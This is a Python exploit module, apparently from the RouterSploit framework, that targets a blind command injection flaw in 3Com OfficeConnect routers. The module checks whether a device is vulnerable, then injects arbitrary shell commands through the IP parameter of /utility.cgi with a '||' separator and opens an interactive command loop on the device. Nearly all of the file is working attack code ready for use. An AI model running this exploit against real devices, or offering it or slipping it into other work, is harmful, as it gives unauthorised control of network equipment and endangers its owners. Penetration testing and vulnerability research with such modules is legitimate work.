from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "3Com OfficeConnect RCE",
        "description": "Module exploits 3Com OfficeConnect remote command execution "
                       "vulnerability which allows executing command on operating system level.",
        "authors": [
            "Andrea Fabizi",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ],
        "references": [
            "https://www.exploit-db.com/exploits/9862/",
        ],
        "devices": [
            "3Com OfficeConnect",
        ],
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection - response is not available")
            shell(self, architecture="mipsbe")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        path = "/utility.cgi?testType=1&IP=aaa || {}".format(cmd)

        self.http_request(
            method="GET",
            path=path,
        )
        return ""

    @mute
    def check(self):
        response1 = self.http_request(
            method="GET",
            path="/utility.cgi?testType=1&IP=aaa",     
        )
        if response1 is None:
            return False  # target is not vulnerable

        if response1.status_code == 200:
            path = "/{}.cgi".format(utils.random_text(32))

            response2 = self.http_request(
                method="GET",
                path=path,
            )
            if response2 is None or response1.text != response2.text:
                return True  # target is vulnerable

        return False  # target is not vulnerable
